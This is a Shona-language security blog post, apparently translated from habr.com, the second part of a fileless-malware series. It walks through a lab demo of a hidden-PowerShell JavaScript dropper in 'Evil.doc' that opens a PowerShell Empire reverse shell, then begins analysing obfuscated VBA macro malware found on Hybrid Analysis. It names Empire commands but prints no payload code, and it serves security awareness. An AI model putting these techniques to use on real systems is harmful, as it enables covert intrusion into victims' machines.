Ichi chinyorwa chikamu cheiyo Fileless Malware series. Zvimwe zvikamu zvese zvenhevedzano:
- Elusive Malware Adventures Chikamu II: Akavanzika VBA Scripts (tiri pano)
Ini ndiri fan wesaiti (Hybrid analysis, apa HA). Iyi imhando ye malware zoo uko iwe unogona kuona zvakachengeteka "zvikara" zvemusango kubva kure zvakachengeteka pasina kurwiswa. HA inomhanyisa malware munzvimbo dzakachengeteka, inorekodha nharembozha, mafaera akagadzirwa, uye internet traffic, uye inounza kwauri ese aya mhinduro kune yega yega sampu yainoongorora. Nekudaro, haugone kutambisa nguva yako uye kushanda nesimba kugadzirisa iyo obfuscated kodhi iwe pachako, asi nekukasira nzwisisa zvese zvinangwa zvehacker.
Mienzaniso yeHA yakabata pfungwa dzangu inoshandisa macoded JavaScript kana Visual Basic for Applications (VBA) zvinyorwa zvakaiswa semacros muShoko kana Excel zvinyorwa uye zvakanamirwa kune phishing emails. Kana yavhurwa, macros aya anotanga chikamu chePowerShell pakombuta yemunhu akabatwa. Hackers vanowanzo tumira Base64-encoded yekuraira rwizi kuPowerShell. Izvi zvese zvinoitwa kuti kurwiswa kuve kwakaoma kuona newebhu mafirita uye antivirus software inopindura mamwe mazwi akakosha.
Neraki, HA inozvisarudzira Base64 uye pakarepo inoratidza zvese mune inoverengeka fomu. Chaizvoizvo, haufanirwe kutarisa kuti magwaro aya anoshanda sei, nekuti iwe unozogona kuona kuzere kuburitsa kwemirairo yekumhanyisa maitiro muchikamu chinoenderana HA. Ona muenzaniso pazasi:
Hybrid parsing intercepts Base64 encoded mirairo inotumirwa kuPowerShell:
... uye wobva wazvisarudzira ivo. #mashiripiti
Π Ini ndakagadzira yangu yakavharwa zvishoma JavaScript mudziyo kuti ndimhanye PowerShell chikamu. Chinyorwa changu ipapo, senge yakawanda PowerShell-based malware, inorodha inotevera PowerShell script kubva kune iri kure webhusaiti. Zvadaro, semuenzaniso, ndakadhawunirodha PS isingakuvadzi yakadhinda meseji pachiratidziri. Asi nguva dziri kuchinja, uye zvino ini ndinoronga kuomesa mamiriro acho.
PowerShell Humambo uye Reverse Shell
Chimwe chezvinangwa zvechiitwa ichi kuratidza kuti (zvinei) zviri nyore sei kuti mubiki apfuure emhando yekudzivirira perimeter uye maantivirus. Kana IT blogger isina hunyanzvi hwekugadzira, seni, manheru mashoma anogona (zvisingaonekwi zvizere, FUD), fungidzira mikana yeanofarira wechidiki hacker!
Uye kana iwe uri munhu wekuchengetedza IT, asi maneja wako haanzwisise zvingangoitika zvekutyisidzira uku, ingovaratidza chinyorwa ichi.
Hackers inorota yekuwana yakananga kune yemunhu akabatwa laptop kana server. Izvi zviri nyore kuita: zvese zvinodikanwa nehacker kubata mafaira mashoma akavanzika palaptop yeCEO.
Neimwe nzira ini ndatova nezve post-kugadzirwa PowerShell Empire runtime. Ngatirangarirei kuti chii.
Icho chakanyanya PowerShell-yakavakirwa penetration yekuyedza chishandiso icho, pakati pemamwe akawanda maficha, chinoita kuti zvive nyore kumhanyisa reverse shell. Unogona kuiongorora zvakadzama pa .
Ngatimboedzai zvishoma. Ini ndakamisa nharaunda yakachengeteka yekuyedza malware muAmazon Web Services gore. Unogona kutevedzera muenzaniso wangu kukurumidza uye zvakachengeteka kuratidza muenzaniso unoshanda wekusagadzikana uku (uye kwete kudzingwa basa nekumhanyisa mavhairasi mukati mebhizinesi perimeter).
Kana iwe ukamhanyisa iyo PowerShell Empire koni, iwe uchaona chimwe chinhu chakadai:
Kutanga, iwe unotanga muteereri maitiro pamushini wako wehacker. Isa "muteereri" murairo, uye tsanangura IP kero ye system yako uchishandisa "set Host". Wobva watanga maitiro evateereri ne "execute" rairo (pazasi). Saka, kudivi rako, iwe unotanga kumirira network yekubatanidza kubva kure kure shell:
Kune rimwe divi, iwe uchafanirwa kugadzira mumiririri kodhi nekuisa iyo "launcher" kuraira (ona pazasi). Izvi zvinogadzira iyo PowerShell kodhi yemumiriri ari kure. Ziva kuti iri Base64 encoded uye inomiririra chikamu chechipiri chemubhadharo. Mune mamwe mazwi, kodhi yangu yeJavaScript ikozvino ichadhonza mumiririri uyu kuti amhanye PowerShell pachinzvimbo chekuratidza zvisingaite mavara pachiratidziri uye kubatana kune yedu iri kure PSE server kuti imhanye reverse shell.
Reverse shell magic. Uyu encoded PowerShell murairo uchabatana nemuteereri wangu uye wotanga ganda riri kure.
Kuti ndikuratidze chiedzo ichi, ndakatora chinzvimbo chemunhu asina mhosva uye ndikavhura Evil.doc, nokudaro ndichimhanyisa JavaScript yedu. Rangarira chikamu chekutanga? PowerShell yakagadziridzwa kuti irege kubuda, saka munhu anenge abatwa haaone chero chinhu chisiri chakajairwa. Nekudaro, kana iwe ukavhura iyo Windows Task Manager, iwe uchaona yekumashure PowerShell maitiro, ayo achiri asingazokonzerese chero alarm kune vakawanda. Nekuti inogara PowerShell, handizvo here?
Zvino, kana iwe uchimhanya Evil.doc, yakavanzika yekumashure maitiro ichabatana kune server inoshandisa PowerShell Empire. Kupfeka ngowani chena yehacker-pentester, ndakadzokera kuPowerShell Empire console, uye ikozvino ndinoona meseji yekuti mumiriri wangu ari kure ari kushanda.
Ipapo ndakanyora murairo we "interact" kuti uvhure goko muPSE - uye ndiri pano! Muchidimbu, ndakapinda muTaco server yandakazvimisikidza imwe nguva yapfuura.
Zvandichangobva kuratidza hazvidi basa rakawanda kudaro kubva kwauri. Unogona kuita zvese izvi zviri nyore mukuzorora kwemasikati kweawa imwe kusvika maviri kuti uvandudze ruzivo rwako rwekuchengetedza ruzivo. Iyo zvakare inzira yakanaka yekunzwisisa kuti ma hackers anopfuura sei ekunze kuchengetedza perimeter dziviriro uye kuverevedza mune ako masisitimu.
Mamaneja eIT anofunga kuti akavaka dziviriro isingapindike kubva kune chero rudzi rwekupindira vangangoiwana ichidzidzisa - zvakanaka, kana uchigona kuvanyengerera kuti vagare padivi pako kwenguva yakakwana, hongu.
Kudzokera kuchokwadi
Sezvandaitarisira, hack chaiyo, isingaonekwe kune avhareji mushandisi, ingori mutsauko wezvandabva kutsanangura. Kuti ndiunganidze zvinyorwa zvebhuku rinotevera, ndakatanga kutsvaga muenzaniso weHA, unoshanda nenzira yakafanana neyakagadzirwa muenzaniso wangu. Uye ini handina kufanirwa kuitsvaga kwenguva yakareba - kune dzakawanda sarudzo dzemaitiro akadaro ekurwisa pane saiti.
Iyo malware yandakazowana paHA ndeye VBA script yaive yakaiswa mugwaro reIzwi. Ndokureva kuti, ini handitomboda kunyepedzera kuwedzera doc, iyi malware ndiyo inonyanya kutaridzika-inotaridzika Microsoft Word gwaro. Kana iwe uri kushamisika, ndakasarudza iyi pateni inonzi .
Ini ndakakurumidza kudzidza kuti kazhinji haugone kudhonza zvinyoro zveVBA zvinyorwa zvakananga kubva pagwaro. Hackers anomanikidza uye anovavanza, uye ivo havaonekwe muShoko rakavakirwa-mukati macro maturusi. Unozoda mudziyo wakakosha kuti uuburitse. Sezvineiwo ndakabva ndasangana nescanner Frank Baldwin. Ndatenda Frank.
Ndichishandisa chishandiso ichi, ndakakwanisa kuburitsa yakaomesesa VBA kodhi. Zvaiita seizvi:
Obfuscation yakaitwa nenyanzvi mumunda wavo. Ndakafadzwa!
Vanorwisa vakanyatsogona kubfuscating kodhi, kwete sekuedza kwangu pakugadzira Evil.doc. Zvakanaka, muchikamu chinotevera, tichawana yedu VBA debugger, kuchera zvakadzika mukodhi iyi, uye enzanisa kuongorora kwedu neHA zvawanikwa.
Source: www.habr.com